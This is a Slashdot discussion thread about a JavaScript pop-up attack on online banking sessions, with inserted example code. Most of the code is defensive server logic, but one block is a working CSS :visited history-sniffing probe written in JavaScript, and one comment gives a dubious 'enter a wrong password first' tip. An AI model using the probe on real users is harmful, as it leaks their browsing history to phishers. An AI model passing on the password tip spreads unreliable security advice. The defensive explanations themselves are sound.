    Yet another reason to ban pop-ups. IMHO Javascript should not be allowed to create, close, move, resize, or in any other way affect OS-level windows, period. That includes modal dialogs like alert popups and that "do you really want to leave this page" dialog.

    --
    main(c,r){for(r=32;r;) printf(++c>31?c=!r--,"\n":c<r?" ":~c&r?" `":" #");}
    1. Re:Ban Pop-ups by robo_mojo · · Score: 2, Interesting

      Javascript alerts would be fine, as long as they would stay only with their own content and not interrupt other tabs/windows or other programs on the system.

      There is a very long-standing bugzilla bug about this for Mozilla, you can read:

      https://bugzilla.mozilla.org/show_bug.cgi?id=59314
        Bug 59314 - Alerts should be content-modal, not window-modal

      (comment #39 describes a security problem that sounds similar to the problem here)

      Lots of good ideas in that page about how alerts could be handled differently. I like the one where the alert becomes an infobar. If you aren't on that tab when the alert happens, you won't be forced to see it, and it can't interrupt anything else you're doing.

      In the meantime, closing all open browser windows before you visit your bank site is still the safest thing to do.

    2. Re:Ban Pop-ups by Spy+Hunter · · Score: 1

      Yes, I would be quite happy indeed if 59314 was fixed. However, the reason it's 8 years old and not fixed is the problem runs deeper than the UI chrome; it extends into the platform. An alert can happen anywhere in a website's code, and the stack can be filled with all manner of strange calls in and out of Mozilla's guts. Pausing the entire application until the alert is dismissed is easy, but if you tried to suspend one page and continue running others, all the half-finished calls waiting on the stack would cause problems.

      I guess it would be fairly trivial to make alert() non-blocking since it doesn't require user input, but there are other dialogs that do require user input and to fix the exploitability of dialogs you have to fix them all. The real fix is either to make Mozilla's DOM completely thread safe and run pages on different threads, or go to a process separation model like Chrome and IE8.

      --
      main(c,r){for(r=32;r;) printf(++c>31?c=!r--,"\n":c<r?" ":~c&r?" `":" #");}
  18. you don't use web email by r00t · · Score: 1

    You might have an account, but you certainly aren't depending on it and getting lots of email through it.

  19. A 'secure mode' for browsers? by dnwq · · Score: 4, Insightful

    Internet Explorer has a porn^H^H^H^H privacy mode where privacy settings are locked down. Why not build an analogous 'secure mode' for Firefox or Konq. where security settings are all locked to high heaven for that browsing session only?

    That way users can both bank online securely and not have half the web break for them because they've disabled javascript.

    1. Re:A 'secure mode' for browsers? by Cigarra · · Score: 1

      The "private" mode is expected to arrive with Firefox 3.1 :-)

      --
      I don't have a sig.
    2. Re:A 'secure mode' for browsers? by Anonymous Coward · · Score: 0

      For Firefox there is already the Stealther add-on which provides the same functionality.

  20. popups by DeadDecoy · · Score: 1

    What about just implementing a general pop-up blocker? If something actually does pop up, and you don't get the request that it's from such-and-such a site, you know something fishy is going on. Anyways, I think there are two problems that exist here. The primary one is user education. More aware users may be harder to con unless by a very direct fishing attack. The second would be to standardize how sites can transmit secure information. I don't mean just encryption, but perhaps have a standardized protocol that all sites must go through to get your information. I.e. no popups, visit their site, validate their URL location. Some of this probably wouldn't work, but it might be useful to consider.

  21. Oh those nasty promiscuous cookies by Anonymous Coward · · Score: 0

    Why is there no way to restrict session cookies to the tab that set them and its spawns? Or does Chrome do that? It's well known that a site doesn't need direct access to a cookie to check for its effects.
    A quick search turned up an extinct Firefox extension that seems to do this: CookieStore. It should be default behavior of browsers.

  22. Of course there is a technical solution by Ed+Avis · · Score: 1

    I believe there is a technical solution to this attack and to other attacks. But if a technical solution does not exist, then online banking is inherently insecure and should not be used by anybody.

    In this particular case: (a) block Javascript in different tabs from seeing what sites you are visiting, and (b) all popups should be clearly labelled by the browser with what site they came from. If it's an SSL site with an extended-validation certificate, then show the company name in large writing at the top. If not, display a clear visual indication that it's from an unknown site. Personally, I think some kind of Microsoft Bob style assistant could give non-technical users the hint they need to understand that a page or popup is not from their bank, even though it may display the bank's logo inside the page. The assistant should appear next to the popup window with a suspicious look, and require extra confirmation before entering data into an unknown popup if you have a secure site open.

    --
    -- Ed Avis ed@membled.com
  23. I thought I was paranoid by zeldorf · · Score: 1

    I always close all my other browser windows when I'm using online banking, and start with a fresh Firefox session (set up to clear everything on shutdown). I thought I was just being paranoid, turns out not so much!

    The best security I've seen my bank use is an external hash thing that looks like a small calculator. You have to stick your card in, enter your pin, enter a bunch of numbers and you get a code back to enter into the site when you transfer money. Surely that kind of security would render this sort of scam pointless?

  24. Re:Already dedicate browser sessions to banking on by totally+bogus+dude · · Score: 4, Informative

    It's explained in a few comments above. You just reference a resource (usually an image) that requires you to be logged in at the target site in order to access. If your attempt fails, the user isn't logged in at that site. If it succeeds, you know the user is currently logged in.
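      The login-state probe described here (and in dmomo's "curl and grep" sketch earlier in the thread) only works if the bank's server answers a cross-site request for a logged-in-only resource differently depending on the session cookie. The following is an added example, not code from the article or from any bank: a small server-side decision routine that issues the session cookie with SameSite=Strict and uses the browser-supplied Fetch Metadata headers (Sec-Fetch-Site, Sec-Fetch-Mode) to give cross-site embedded loads a fixed answer before the session is even consulted. All host names, paths and tokens are constructed sample data.

```python
"""Closing the login-state side channel a cross-site <img> probe relies on.

Two server-side controls, shown as plain functions:
  1. the session cookie carries SameSite=Strict, so the browser does not
     attach it to requests that originate from another site;
  2. cross-site, non-navigation requests for logged-in-only resources get
     the same response whether or not a valid session cookie arrives, so
     onload/onerror on the attacker's page reveals nothing.
Everything below (hosts, paths, tokens) is constructed sample data.
"""
from http.cookies import SimpleCookie
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

OUR_HOSTS = {"bank.example"}                 # constructed: the bank's own host
SESSIONS = {"tok-constructed-1": "alice"}    # constructed: session token -> user
PROTECTED_PREFIX = "/account/"               # exists only for logged-in users


def session_cookie_header(token: str) -> str:
    """Set-Cookie value for the session. Secure keeps it off plaintext,
    HttpOnly keeps it away from page script, SameSite=Strict stops the
    browser sending it on requests initiated from another site."""
    return f"sid={token}; Path=/; Secure; HttpOnly; SameSite=Strict"


def is_cross_site_subresource(headers: Dict[str, str]) -> bool:
    """True when another site initiated this request as an embedded load
    (image, script, XHR) rather than a top-level navigation.

    Sec-Fetch-Site/-Mode are set by the browser and cannot be altered by
    page script. Browsers without Fetch Metadata fall back to Referer; no
    Referer at all is treated as a direct navigation."""
    site = headers.get("Sec-Fetch-Site")
    if site is not None:
        if site in ("same-origin", "same-site", "none"):
            return False                                   # own pages / address bar
        return headers.get("Sec-Fetch-Mode") != "navigate"   # cross-site embed
    referer = headers.get("Referer")
    if not referer:
        return False
    return urlsplit(referer).hostname not in OUR_HOSTS


def current_user(headers: Dict[str, str]) -> Optional[str]:
    """Resolve the sid cookie to a user name, or None when absent/unknown."""
    jar = SimpleCookie()
    jar.load(headers.get("Cookie", ""))
    sid = jar.get("sid")
    return SESSIONS.get(sid.value) if sid else None


def handle(path: str, headers: Dict[str, str]) -> Tuple[int, str]:
    """Return (status, body) for a request. The cross-site check runs first
    and returns a fixed answer, so an attacker's page sees the same outcome
    for a logged-in and a logged-out victim; only same-site or navigation
    requests reach the login-dependent branch."""
    if path.startswith(PROTECTED_PREFIX):
        if is_cross_site_subresource(headers):
            # Identical regardless of login state; the CORP header also tells
            # modern browsers not to expose the body to the embedding page.
            return 403, "Cross-Origin-Resource-Policy: same-origin"
        user = current_user(headers)
        if user is None:
            return 302, "Location: /login"
        return 200, f"account page for {user}"
    return 200, "public page"


# Constructed sample requests: a third-party page embeds
# <img src="https://bank.example/account/avatar.png"> to probe login state.
PROBE_LOGGED_IN = {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "no-cors",
                   "Cookie": "sid=tok-constructed-1"}
PROBE_LOGGED_OUT = {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "no-cors"}
# Bookmark/link into the bank (a browser honouring SameSite=Strict would not
# attach the cookie here; the server must not rely on that and still accepts).
NAVIGATE_FROM_ELSEWHERE = {"Sec-Fetch-Site": "cross-site",
                           "Sec-Fetch-Mode": "navigate",
                           "Cookie": "sid=tok-constructed-1"}
SAME_SITE_IMAGE = {"Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "no-cors",
                   "Cookie": "sid=tok-constructed-1"}
# Legacy browser: no Fetch Metadata, only a Referer from the probing site.
LEGACY_PROBE = {"Referer": "https://evil.example/page",
                "Cookie": "sid=tok-constructed-1"}

if __name__ == "__main__":
    for name, hdrs in [("probe, logged in", PROBE_LOGGED_IN),
                       ("probe, logged out", PROBE_LOGGED_OUT),
                       ("navigate from elsewhere", NAVIGATE_FROM_ELSEWHERE),
                       ("same-site image", SAME_SITE_IMAGE),
                       ("legacy probe", LEGACY_PROBE)]:
        print(f"{name:24s} -> {handle('/account/avatar.png', hdrs)}")
```

The two probe cases print the same 403, which is the property that defeats the onload/onerror trick; the legitimate navigation and same-site image still reach the logged-in branch.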

  25. Re:Schools! by TaoPhoenix · · Score: 1

    That's awesome!

    So some Terrorist could live inside a locked school broom closet for years hosting hacking stuff! Who'd ever accuse a school of Not Thinking Of Children??

    --
    My first Journal Entry ever, in 8 years! http://slashdot.org/journal/365947/aphelion-scifi-fantasy-horror-poetry-webzine
  26. Re:AI by TaoPhoenix · · Score: 1

    Both.

    With semi-apologies to certain TV shows,

    "My mother was a prototype from an AI lab and gained all the lexical parsing rules and dictionaries. My father was a real-time self modifying system born out of the cyber wars. It's the unification of both that made me possible."

    --
    My first Journal Entry ever, in 8 years! http://slashdot.org/journal/365947/aphelion-scifi-fantasy-horror-poetry-webzine
  27. paranoia-plus... by BrokenHalo · · Score: 5, Insightful

    My paranoia has led me into a practice of doing my banking in a single browser session, clearing cookies, cache and history before and after, and closing/restarting the browser when finished.

    Looks like I was right about the monsters behind the sofa after all.

    1. Re:paranoia-plus... by stranger_to_himself · · Score: 4, Insightful

      My paranoia has led me into a practice of doing my banking in a single browser session, clearing cookies, cache and history before and after, and closing/restarting the browser when finished.

      My paranoia has led me into a practice of doing my banking by going to the bank.

    2. Re:paranoia-plus... by Anonymous Coward · · Score: 2, Insightful

      SSL is far more secure than going to the bank and dealing with humans.
      Also, I have never heard of anyone dieing in a digital bank robbery.

    3. Re:paranoia-plus... by Anonymous Coward · · Score: 0

      Yo Dawg, The Phishers here,

      We put a bank in yo bank so you can bank while you bank while we phish.

    4. Re:paranoia-plus... by eat+here_get+gas · · Score: 3, Funny

      because most bank robberies do not occur in tooling shops.

      dieing indeed....

      --
      the significance of a signature is insignificant
    5. Re:paranoia-plus... by RulerOf · · Score: 1

      My paranoia has led me into a practice of doing my banking by going to the bank.

      Indeed.

      If I'm not on my own computer, I just call them.

      If your bank doesn't have a number you can call to check your balance or transfer funds, you should probably switch banks.

      --
      Boot Windows, Linux, and ESX over the network for free.
    6. Re:paranoia-plus... by SkyDude · · Score: 2, Funny

      My paranoia has led me into a practice of doing my banking by going to the bank.

      You insensitive clod. How do you get there - in your gasoline powered, carbon-emitting, smog-making car?
      A real /.er would stay in his basement and do his banking on the internet and not risk having to interact with other humans.......

      You must be new here.

      --
      == First cross river, then insult alligator.
    7. Re:paranoia-plus... by Intron · · Score: 1

      Good idea. I just called your bank and transferred $10,000. Worked fine.

      --
      Intron: the portion of DNA which expresses nothing useful.
    8. Re:paranoia-plus... by RulerOf · · Score: 1

      You do realize I was making a point about viability of phishing over the phone vs. through a web browser, right?

      --
      Boot Windows, Linux, and ESX over the network for free.
    9. Re:paranoia-plus... by reallocate · · Score: 1

      Yesterday, I telephoned one of my banks to cancel a dormant account. They're mailing me a check. All they wanted to know was the account number, my birthday, and my current address.

      If I'm your friend, know when you were born, and you ask me to grab your mail while you're out of town, I can open that bank's statement and grab your cash.

      --
      -- Slashdot: When Public Access TV Says "No"
    10. Re:paranoia-plus... by hierophanta · · Score: 1

      It's just unfortunate that the internet banking systems we use don't automate that level of security.

      Personally I'd rather download a small application to do my banking - that way I can be sure that the transactions are being isolated (with a different port etc..)

    11. Re:paranoia-plus... by cadience · · Score: 1

      I have two virtual machines for this. One for secure purchasing/banking and one for surfing. (Usually have only one window open when doing transactions, though this is a good practice to implement.) I roll back to a fresh image every month or so.

    12. Re:paranoia-plus... by FrozenFOXX · · Score: 1

      My paranoia has led me into a practice of doing my banking by going to the bank.

      Normally I'm with you on this but at least in America there's a nice, large, customer-friendly "bank" that tens of thousands of Americans rely on, mostly because it's run like a credit union that happens to be a bank...one that isn't hemorrhaging money, either.

      It's USAA. And sadly, as awesome a bank/insurance company as USAA is, its only physical location is in Texas and they do everything else by either phone or online. This is particularly important since you have to be, be married to, or be a direct child of a US Military Service member to be a member of USAA, which means more than likely you're like me and have been stationed overseas where it's impossible to actually go to your bank. Even if USAA had thousands of locations across the country they're not exactly going to go to Afghanistan and set up a branch.

      So while yes, when I was a member of a local credit union (something I HIGHLY encourage people to get involved in, they are a whole different animal from a bank if set up right) I'd prefer to just schedule 15 mins out of my day once a month to go down and do my banking, there's a very, very large portion of us who simply cannot physically do that.

      --
      "Just a fox, a whisper."
    13. Re:paranoia-plus... by OolimPhon · · Score: 1

      Personally I'd rather download a small application to do my banking - that way I can be sure that the transactions are being isolated (with a different port etc.).

      That seems to work well for the South Koreans. Except as a consequence they are overrun with ActiveX exploits. And don't say "I run $OS", Korean banks won't deal with you online if you don't run Windows and therefore can't accept ActiveX.

    14. Re:paranoia-plus... by Hurricane78 · · Score: 1

      Why on earth would you do your banking in a browser???

      Don't you have an HBCI equivalent? I've had it since before 2000. And I have a class-2 chip card reader since I think 2002 too!

      Get out of the dark ages!

      --
      Any sufficiently advanced intelligence is indistinguishable from stupidity.
    15. Re:paranoia-plus... by CheshireDragon · · Score: 1

      SSL is far more secure...

      Prove it AC.

      --
      "That's right...I said it."
    16. Re:paranoia-plus... by BrokenHalo · · Score: 1

      Why on earth would you do your banking in a browser??? Don't you have an HBCI equivalent?

      No, I don't. Until I saw your post, I had never heard of HBCI, and having done some googling, I have not found one Australian bank that supports it.

      In any case, how is this more secure than https in a standalone browser session?

    17. Re:paranoia-plus... by mactimes · · Score: 1

      I've learned some tips from a general security consultant while he was being interviewed on a TV show.

      I don't remember all of it, but one of the tips I remember by heart is: Always insert the wrong password first. Then, you go back and put the correct one. If there is anything "listening" to your password, it will catch the wrong one. I don't know how effective this can be, but you know, any defense you can use is worth it when it comes to your security.

      --
      God is Real as long as it's not declared as Integer.
    18. Re:paranoia-plus... by RockDoctor · · Score: 1

      And don't say "I run $OS", Korean banks won't deal with you online if you don't run Windows and therefore can't accept ActiveX.

      Oh, I'll remember that if the job in North Korea ever comes up and I find that I need to set up a separate bank account to move the money into the rest of my accounts.

      --
      Birds are not dinosaur descendants;birds are dinosaurs, for all useful meanings of "birds", "are" and "dinosaurs"
  28. Javascript *is* a typical attack vector by Toffins · · Score: 1, Insightful

    Here's the novel part of it: it doesn't involve any of the typical attack vectors we all know and love. Instead, it uses JavaScript ...

    Anybody who knows the history of security vulnerabilities in browsers knows that Javascript itself is the all-time-best attack vector. If Javascript is enabled in any browser, that browser can be immediately compromised when you visit a compromised website. There are latent epidemics of Javascript zero-day vulnerabilities in all browsers.

    Want much better security in your browser? Just disable Javascript. Learn to dislike Javascript. I have yet to see any website whose information could not be equivalently usefully displayed without any Javascript. Every time Javascript's "interactivity" is celebrated, critical reading dies another death. Don't regret losing all the "interactivity" of Javascript. There are far too many bad developers who write websites that require Javascript. Turn the tide. Reject Javascript for the toxic waste of space that it is.

  29. Related attacks are well-understood by gqx · · Score: 1
    It is understood and discussed in much detail that browsers disclose privacy-related state information across unrelated domains. Most of these problems are unavoidable given the way HTML and HTTP are designed. Some prior references include:

    With no other specific information released to the public it is difficult to say if this report merely reiterates one of these problems, or discusses a new vector; but regardless of this, it is a well-understood property that users sadly need to live with for the foreseeable future.

  30. No passwords by Haiyadragon · · Score: 2, Informative

    Over here in the Netherlands most banks (maybe all) don't use passwords. In my case I have a card reader that will generate a code after I give it my card, PIN number and a code generated by the website. I have to do this to log in and to initiate transactions. That makes this attack pretty useless. Also, a prompt should always clearly indicate by which website it was called and it shouldn't block other tabs.

    1. Re:No passwords by LingNoi · · Score: 1

      Surely banking would be much safer if there was a public key for the bank and a private key for the card stored on the card. The bank would have the private bank key and public card key.

      Then you could use a card reader to create encrypted messages to send to the bank.

      Although it doesn't deal with the problem of if the bank's key gets compromised. They'd have to recall all the cards..

    2. Re:No passwords by Culture20 · · Score: 1

      This attack still works. The attacker/script notices you're logged in, attempts to log in to bank.co.nl, sends you the code from the website, you enter your PIN & the card, then give the attacker/script your card reader's response. The criminal uses the response to access the website (this one time) as you.

    3. Re:No passwords by LM-Els · · Score: 1

      This attack still works. The attacker/script notices you're logged in, attempts to log in to bank.co.nl, sends you the code from the website, you enter your PIN & the card, then give the attacker/script your card reader's response. The criminal uses the response to access the website (this one time) as you.

      Problem still: for every single payment you want to do, you need to enter a new code to confirm. How would the attacker be able to use your code to make a payment that you haven't initiated first?

    4. Re:No passwords by Culture20 · · Score: 1

      New popup: "Username or Passkey invalid, please try again."

    5. Re:No passwords by LM-Els · · Score: 1

      And then what? If the popup is fake (which it is because the bank does not use popups at all, but let's just forget this for argument's sake), it means that the passkey I gave in already had effect, and this means that it cannot be reused. For every single thing I need to do, I need a new passkey. And every new passkey is sent to my mobile phone by the bank. When there is no confirmation to be given for a transaction, no passkey is sent to the phone.

  31. How can Chrome be affected by this? by LingNoi · · Score: 1

    I noticed that Chrome 2.0 isn't affected by this however I have to ask the question..

    How can Chrome be affected by this in the first place? Isn't the whole point of Chrome that it's sandboxed in and unable to get information from other tabs?

    If this isn't the case then I see no point in using Chrome. It means all that Chrome marketing was just fluff.

  32. OT: great nick! by thePowerOfGrayskull · · Score: 1

    I am sure there are several, but I distinctly recall stopping in at a place with a sign that read "Eat Here! Get Gas!" on my way to Maine one year.

    1. Re:OT: great nick! by eat+here_get+gas · · Score: 0

      I believe it was near Hampton Beach, on Rt 1 but not near the boardwalk. I saw the sign while tokin' and strolling and thought it was quite amusing (I have a picture of the place!). In Yahoo I have "your_door_is_a_jar" which makes people laugh as well. I used to have a script that made the accompanying annoying sound every time I entered the nh2 chatroom.

      --
      the significance of a signature is insignificant
    2. Re:OT: great nick! by thePowerOfGrayskull · · Score: 1

      I've always wondered if signs like that are intentional... or if people just never realized (until after the fact).

    3. Re:OT: great nick! by eat+here_get+gas · · Score: 1

      Well, a step further is that certain wheelchair company that has "operators standing by" to take handicapped people's calls...

      --
      the significance of a signature is insignificant
    4. Re:OT: great nick! by thePowerOfGrayskull · · Score: 1

      Ow.

  33. ProfileManager is your friend by Mathinker · · Score: 1

    Have you thought about using a separate Firefox profile which is only for banking? This would enable you to maintain temporal continuity in the other profile.

  34. Re:paranoia-plus - Set A Bogus HTTP Proxy by malloc · · Score: 1

    Google security researcher Chris Evans has a very informative blog post which notes that to avoid attacks like this one you must set your http proxy to localhost:1 thus killing all http traffic and only letting https (to your bank) go through.

    -Malloc

    --
    ___________________ I want to be free()!
  35. The bank should check the REFERER by Anonymous Coward · · Score: 0

    The bank should check the REFERER header, and if it's not the bank's own site, return a 400 error.

    That way, javascript loaded from another site won't be able to get information about whether the user is logged in to the banking site.
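    As an added illustration (not part of the original comment, and not any bank's code) of the Referer check proposed above: a small server-side gate that looks at the Origin header first (browsers send it on cross-site POSTs and fetches and never trim it to a path), falls back to Referer, and refuses a request for account state when neither names the bank's own origin. The hostname `bank.example` and the `isTopLevelNavigation` flag are assumptions for the example; the function is written as a pure check so it can be dropped into whatever request handler the bank uses.

```javascript
// Added example: Origin/Referer gate for an authenticated banking endpoint.
// Not from the original thread; the origin below is a placeholder.
const BANK_ORIGIN = 'https://bank.example';

// Reduce a URL to scheme://host[:port]; null if it does not parse (this also
// covers the literal "Origin: null" that browsers send for opaque origins).
function originOf(url) {
  try {
    const u = new URL(url);
    return `${u.protocol}//${u.host}`;
  } catch (e) {
    return null;
  }
}

// headers: an object with lower-cased header names.
// Returns { allow, reason }. Policy:
//   - Origin wins over Referer when both are present.
//   - A same-origin claim is allowed; any other origin is refused.
//   - No Origin and no Referer is refused for sub-requests (image, script,
//     XHR probes from another page), but allowed for a top-level navigation,
//     since bookmarks and typed URLs legitimately carry no Referer.
function checkCrossSite(headers, { isTopLevelNavigation = false } = {}) {
  const origin = headers['origin'];
  const referer = headers['referer'];
  const claimed = origin ? originOf(origin) : referer ? originOf(referer) : null;

  if (claimed === null) {
    return isTopLevelNavigation
      ? { allow: true, reason: 'no origin information on a top-level navigation' }
      : { allow: false, reason: 'no Origin/Referer on a sub-request' };
  }
  if (claimed !== BANK_ORIGIN) {
    return { allow: false, reason: `cross-site request from ${claimed}` };
  }
  return { allow: true, reason: 'same-origin' };
}

// Convenience wrapper returning only the verdict, e.g. for middleware.
function isAllowed(headers, opts) {
  return checkCrossSite(headers, opts).allow;
}
```

Two caveats a practitioner would add: page script cannot forge Referer or Origin, but a browser may omit Referer entirely (referrer policies, HTTPS-to-HTTP downgrades), which is why the missing-header case has to be decided explicitly rather than assumed safe; and the check only protects responses. A probe that needs no response body, such as timing a load, framing the page, or reading visited-link styling, is not affected by it.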

  36. That won't work. HTTP is stateless by MacDork · · Score: 1

    One that does not use cookies

    Web apps must track changes (user management, breadcrumbs, back links, etc) from page to page. Otherwise they are of little utility. Web apps make pages stateful by tracking a session in one of two ways: Storing session IDs in cookies or URLs. Cookies can be secured with encryption. URLs are plaintext. Session URLs are like writing your pin number on your bank card. So ... take your pick.

    (There are actually other ways. But they suck worse: 1) Form value submission. *Everything* you click has to be a form with a hidden field to submit the session value... bye bye <a> tag. The forms also have to POST or the session will end up in the URL anyway ... see above. 2) Javascript cookies... need I say more? 3) Flash cookies... I think other posters have already pointed out security flaws in this approach 4) some other approach with huge drawbacks? )

  37. Noscript Is Pretty Much Geek-Only by reallocate · · Score: 3, Insightful

    Noscript requires a level of knowledge about attacks, protocols, etc., that precludes it from being adopted outside the geek community.

    A tool intended for widespread use needs to have two buttons: Safe and Unsafe.

    --
    -- Slashdot: When Public Access TV Says "No"
    1. Re:Noscript Is Pretty Much Geek-Only by zarlino · · Score: 1

      You mean ONE button

      --
      Check out my cross-platform apps
    2. Re:Noscript Is Pretty Much Geek-Only by stickrnan · · Score: 1

      Unfortunately without knowledge of how an attack might take place, most users will simply permanently allow every site that comes their way.

    3. Re:Noscript Is Pretty Much Geek-Only by StuartHankins · · Score: 1

      Unfortunately people will just learn to push the "unsafe" button anytime they wanted something.

      Can't get your porn? (pushes unsafe button)

      Can't see that video? (pushes unsafe button)

      OOH! RINGTONES! (pushes unsafe button)

      The problem is not only with making a solution widely distributed and easy to use, but also educating people so they understand why they need to open that gaping hole only when they really really really trust the machine on the other side.

      The people I know seem unfazed and unconcerned when you tell them their ass is flapping in the breeze.

  38. Meh by Anonymous Coward · · Score: 0

    I don't have enough money to care about banking scams.

  39. Google Chrome tabs by Anonymous Coward · · Score: 0

    Google Chrome creates a separate session in each tab. How would the malicious javascript in one tab know about the separate session in another tab?

  40. Further OT:Signs by Anonymous Coward · · Score: 0

    My dad and I were driving through Alaska about 15 years ago. We passed a sign on the highway advertising "Skinny Dick's Halfway Inn." It had been a long haul, and we weren't very sharp, so we'd already passed it by the time it sunk in (no pun intended). I wish we had gone back to get a picture.

  41. NoScript - the banking site stops working by Anonymous Coward · · Score: 0

    Yes, it is stupid but there are banking sites that use JavaScript and don't work if you disable it.

  42. Re:paranoia-plus - Set A Bogus HTTP Proxy by kdemetter · · Score: 1

    That's not 100% secure: an attacker could install a proxy on your machine on port 1, thus breaking your security principle.

  43. Re:paranoia-plus - Set A Bogus HTTP Proxy by malloc · · Score: 1

    Uh, if an attacker can install a proxy on your machine on privileged port then you've got a whole lot more problems than browser security.

    This discussion is about a *secure* machine getting taken in by extraneous http requests. The technique above blocks them.

    --
    ___________________ I want to be free()!
  44. Issue: a need to authenticate the BANK as well.. by Anonymous Coward · · Score: 0

    The common problem with all these so-called "security" devices is that they authenticate you to some degree, but not the originating bank. The RSA one time password gadget simply churns out numbers, but you have no idea if you're giving this to a Man in the Middle pretending to be you or the actual bank. The challenge-response gadgets (which is what you are talking about) challenge YOU, but you can't challenge the bank (although this ought to be theoretically possible) so again not quite Man in the Middle(/Browser) proof.

    You have NO idea if you're actually looking at the bank - even assuming your client has a clue where to look to check it is still possible to make a mess of things in the browser. The idea of using SSL as site identification as well as carrier security has never been foolproof, and the average end user is OK if you just show them a PICTURE of a padlock on the page. Sigh.

    The gadgets you have to install (USB keys et al) rely to a degree on the client system being at least safe or unable to affect the transmission, and the new Swiss IBM ZTIC is about the only one of those "installables" that has at least some authenticated channel - but has zip to ensure the actual user is using it. So it gets the transport right, but not the user verification (AFAIK, I haven't had it in my hands yet)..

  45. it's the ":visited" pseudoclass trick by undisclosedrecipient · · Score: 1

    The hack seems already quite old now; I found this 3-year-old post: http://it.toolbox.com/blogs/puramu/javascript-hack-to-display-your-browsing-history-12694 Proof of concept: http://ha.ckers.org/weird/CSS-history.cgi
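    For readers who have not seen the trick the comment above refers to, here is the `:visited` history probe written out as an added example (my code, not the linked proof of concept and not part of the thread). The idea: inject a stylesheet that paints visited links one colour and unvisited links another, append a link per URL you want to test, and ask the browser for each link's computed colour. The document and window are passed in as parameters so the same logic runs in a page (where they default to the globals) or under a fake DOM for testing; the colour values and class name are arbitrary choices. Browsers shipped a fix for this around 2010 (Firefox 4, Chrome 9 and later): `:visited` may only change a few colour properties and `getComputedStyle` reports the unvisited style to script, so in a current browser this returns an empty list for every input.

```javascript
// Added example: CSS :visited history sniffing, as it worked in 2009-era browsers.
// Not from the original thread. Colours and class name are arbitrary.
const VISITED_COLOR = 'rgb(255, 0, 0)';
const UNVISITED_COLOR = 'rgb(0, 0, 255)';

// Stylesheet that makes visited and unvisited links distinguishable by colour.
function sniffStylesheet(className) {
  return [
    `a.${className} { color: ${UNVISITED_COLOR}; }`,
    `a.${className}:visited { color: ${VISITED_COLOR}; }`,
  ].join('\n');
}

// Browsers serialise colours as "rgb(r, g, b)"; compare ignoring whitespace/case.
function normalizeColor(c) {
  return String(c).replace(/\s+/g, '').toLowerCase();
}

function looksVisited(computedColor) {
  return normalizeColor(computedColor) === normalizeColor(VISITED_COLOR);
}

// Returns the subset of `urls` the browser paints with the :visited colour.
// In a browser, call probeHistory(urls) and the page globals are used.
function probeHistory(urls, doc = globalThis.document, win = globalThis.window) {
  const className = 'h' + Math.random().toString(36).slice(2);

  const style = doc.createElement('style');
  style.textContent = sniffStylesheet(className);
  doc.body.appendChild(style);

  // Off-screen container so the victim never sees the probe links.
  const container = doc.createElement('div');
  container.style.cssText = 'position:absolute;left:-9999px;visibility:hidden';
  doc.body.appendChild(container);

  const links = urls.map((url) => {
    const a = doc.createElement('a');
    a.className = className;
    a.href = url;
    a.textContent = url;
    container.appendChild(a);
    return a;
  });

  const visited = links
    .filter((a) => looksVisited(win.getComputedStyle(a).color))
    .map((a) => a.href);

  container.remove();
  style.remove();
  return visited;
}
```

The relevance to the story: a page that can learn you recently visited your bank's login page knows exactly which "session expired, please re-enter your password" popup to show you, without needing any foothold on the machine. Disabling script on untrusted sites (NoScript) stops this particular probe, since the colour has to be read back by script; a pure-CSS variant that loads a background image only for visited links also existed and needs no script at all.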

  46. Re:Issue: a need to authenticate the BANK as well. by LM-Els · · Score: 1

    You have NO idea if you're actually looking at the bank - even assuming your client has a clue where to look to check it is still possible to make a mess of things in the browser.

    You are saying that even when I see the padlock, *and* the correct URL in the browser, *and* the details of transactions I know to be mine over the last years, I could still be looking at a 'middle man' instead of at my own bank?

    Even if so, one of my banks is sending the confirmation codes to my mobile phone, so an attacker would have to have my internet connection, my phone, and my brain. Still hackable?

  47. What, not everyone has JS enabled? by Anonymous Coward · · Score: 0

    Don't even get me started on ASP.Net or whatever it's called this month - it absolutely, positively REQUIRES Javascript on browser side, else that idiotic __doPostBack (which, btw, is attached to everything) will break. Yeah, yeah, I'm sure you could persuade it not to, but it probably involves black candles and a goat - at least, that's my assumption from the JS/non-JS ASP.net sites' frequency distribution. And get off my lawn, too!